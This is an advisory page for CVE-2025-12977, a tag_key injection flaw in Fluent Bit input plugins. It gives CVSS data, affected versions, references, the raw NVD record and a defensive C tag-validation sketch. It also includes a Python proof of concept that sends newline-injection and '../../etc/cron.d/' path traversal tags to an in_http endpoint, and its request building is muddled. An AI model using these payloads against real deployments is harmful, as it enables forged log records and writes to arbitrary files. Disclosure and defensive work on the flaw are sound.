Security Vulnerability Report
CVE-2025-12977 CVSS 9.1 CRITICAL

CVE-2025-12977

Published: 2025-11-24 15:15:47
Last Modified: 2025-11-28 18:15:47

Description

Fluent Bit in_http, in_splunk, and in_elasticsearch input plugins fail to sanitize tag_key inputs. An attacker with network access or the ability to write records into Splunk or Elasticsearch can supply tag_key values containing special characters such as newlines or ../ that are treated as valid tags. Because tags influence routing and some outputs derive filenames or contents from tags, this can allow newline injection, path traversal, forged record injection, or log misrouting, impacting data integrity and log routing.
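The description above comes down to a tag taken from record data being used for routing and file naming without validation. The following C sketch is an added example, not Fluent Bit's patch or project code: it checks a length-delimited tag against an allowlist before building an output path. `TAG_MAX`, `tag_is_safe`, `build_output_path`, the allowed character set and the `/var/log/flb` directory are all assumptions made for illustration.

```c
#include <stdio.h>
#include <string.h>

#define TAG_MAX 128 /* assumed length cap, not a Fluent Bit constant */

/* ASCII-only allowlist; avoids locale-dependent <ctype.h> behaviour. */
static int tag_byte_ok(unsigned char c)
{
    return (c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') ||
           (c >= '0' && c <= '9') || c == '.' || c == '_' || c == '-';
}

/* Returns 1 when a record-supplied tag may be used for routing and as a
 * file name. The tag is length-delimited, so an embedded NUL is rejected
 * like any other byte outside the allowlist (newline, '/', '\\', space). */
int tag_is_safe(const char *tag, size_t len)
{
    if (tag == NULL || len == 0 || len > TAG_MAX) return 0;
    if (tag[0] == '.') return 0;            /* ".", "..", hidden files */
    for (size_t i = 0; i < len; i++) {
        if (!tag_byte_ok((unsigned char) tag[i])) return 0;
        if (i > 0 && tag[i] == '.' && tag[i - 1] == '.') return 0;
    }
    return 1;
}

/* Builds "<dir>/<tag>" into out. Returns 0 on success, -1 when the tag is
 * rejected or the result would not fit (never a silently truncated path). */
int build_output_path(char *out, size_t outsz, const char *dir,
                      const char *tag, size_t len)
{
    int n;
    if (!tag_is_safe(tag, len)) return -1;
    n = snprintf(out, outsz, "%s/%.*s", dir, (int) len, tag);
    return (n < 0 || (size_t) n >= outsz) ? -1 : 0;
}

int main(void)
{
    /* Constructed sample tags: one benign, two shaped like the advisory. */
    const char *tags[] = { "app.web-1", "test\nforged: x", "../../etc/x" };
    char path[256];
    for (size_t i = 0; i < 3; i++) {
        int rc = build_output_path(path, sizeof path, "/var/log/flb",
                                   tags[i], strlen(tags[i]));
        printf("tag %zu: %s\n", i, rc == 0 ? path : "rejected");
    }
    return 0;
}
```

Rejecting a bad tag outright, rather than stripping characters from it, keeps a crafted value from collapsing into a different valid tag and being routed somewhere unintended.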

CVSS Details

CVSS Score: 9.1
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:treasuredata:fluent_bit:4.1.0:*:*:*:*:*:*:* - VULNERABLE
Fluent Bit < 4.0.9 (4.0.x branch)
Fluent Bit < 4.1.0 (4.1.x branch)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# CVE-2025-12977 PoC - Fluent Bit tag_key Injection
# Target: Fluent Bit in_http plugin with vulnerable tag_key parameter


def exploit_fluentbit_tag_injection(target_url, payload_type='newline_injection'):
    """
    Demonstrate tag_key injection vulnerability in Fluent Bit

    payload_type options:
    - 'newline_injection': Inject newline to forge additional log entries
    - 'path_traversal': Use ../ to manipulate file output paths
    """
    if payload_type == 'newline_injection':
        # Inject newline character to create additional log entries
        malicious_tag = "test\n forged-entry: malicious_data_injected"
    elif payload_type == 'path_traversal':
        # Path traversal to write outside intended directory
        malicious_tag = "../../etc/cron.d/malicious"
    else:
        malicious_tag = "test"

    # HTTP request to in_http plugin with malicious tag_key
    params = {
        'tag_key': malicious_tag,
        'message': 'original_log_entry'
    }

    try:
        response = requests.get(f'{target_url}/tag_key={malicious_tag}', params=params, timeout=10)
        print(f"[*] Request sent to {target_url}")
        print(f"[*] Malicious tag_key: {repr(malicious_tag)}")
        print(f"[*] Response status: {response.status_code}")
        return response.text
    except requests.exceptions.RequestException as e:
        print(f"[!] Request failed: {e}")
        return None


# Example usage
if __name__ == '__main__':
    target = 'http://localhost:2020/'
    exploit_fluentbit_tag_injection(target, 'newline_injection')
    exploit_fluentbit_tag_injection(target, 'path_traversal')
```

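References

https://fluentbit.io/blog/2025/10/28/security-vulnerabilities-addressed-in-fluent-bit-v4.1-and-backported-to-v4.0/
https://www.oligo.security/blog/critical-vulnerabilities-in-fluent-bit-expose-cloud-environments-to-remote-takeover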

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12977", "sourceIdentifier": "[email protected]", "published": "2025-11-24T15:15:46.770", "lastModified": "2025-11-28T18:15:46.550", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Fluent Bit in_http, in_splunk, and in_elasticsearch input plugins fail to sanitize tag_key inputs. An attacker with network access or the ability to write records into Splunk or Elasticsearch can supply tag_key values containing special characters such as newlines or ../ that are treated as valid tags. Because tags influence routing and some outputs derive filenames or contents from tags, this can allow newline injection, path traversal, forged record injection, or log misrouting, impacting data integrity and log routing."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-1287"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:treasuredata:fluent_bit:4.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "4D0EA105-B741-4E44-828A-9300B09A7A79"}]}]}], "references": [{"url": "https://fluentbit.io/blog/2025/10/28/security-vulnerabilities-addressed-in-fluent-bit-v4.1-and-backported-to-v4.0/", "source": "[email protected]"}, {"url": "https://www.oligo.security/blog/critical-vulnerabilities-in-fluent-bit-expose-cloud-environments-to-remote-takeover", "source": "[email protected]"}]}}